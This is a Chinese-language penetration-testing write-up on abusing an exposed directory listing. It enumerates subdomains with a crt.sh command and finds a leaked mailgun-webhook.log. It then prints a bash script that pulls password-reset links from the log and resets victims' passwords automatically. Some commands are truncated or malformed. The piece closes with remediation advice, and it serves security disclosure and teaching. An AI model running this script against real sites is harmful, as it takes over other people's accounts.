滲透測試實戰:利用列目錄漏洞重置密碼
列目錄是最常見的錯誤配置之一,列目錄漏洞到底影響多嚴重,取決於關鍵性文件的出現。
最近,我在滲透測試中,我遇到了一個有趣的目錄列表,並且可以利用它。通過枚舉,我發現了一個子域,這是分段伺服器,並可以通過互聯網訪問。
[nishaanthguna:~/essentials]$ curl --silent https://crt.sh/?q=%.domain.com | sed "s/]+>//g" | grep -i domain.com | tail -n +9 | cut -d ">" -f2 | cut -d "
www.domain.com
blog.domain.com
stag.domain.co
在進行埠掃描時,發現埠8080已打開,並有一個目錄列表,我發現有個log日誌。
從log中,我發現日誌不僅泄露了個人和開發人員的電子郵件地址,還有重置密碼鏈接。像這樣的東西。
日誌文件中,可能出現這樣的功能場景:
2.受害者點擊發送到他們的電子郵件地址的鏈接。
3.攻擊者獲取密碼重置令牌,因為目錄列表並重置密碼。
我寫了一個快速的腳本來查看mailgun-webhook.log文件,搜索重置鏈接並自動重置密碼。
curl https://domain.com/mailgun-webhook.log | tee direct.txt
if grep -Fxq "reset" direct.txt
then
echo "[+]Found a Password Reset link"
link=$(cat direct.txt | grep -i reset | cut -d "," -f6 |
cut -d "" -f1 | head -n 1)
curl "$link"-H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6)"
--data "password=testpassword%21%21&confirmation=testpassword%21%21" --compressed
echo "[+]Password changed to testpassword!!"
else
echo "[-]Reset link not found"
fi
建議禁用目錄列表,不要以明文形式存儲敏感信息,例如憑證,密碼重置鏈接,API密鑰。
TAG:嘶吼RoarTalk |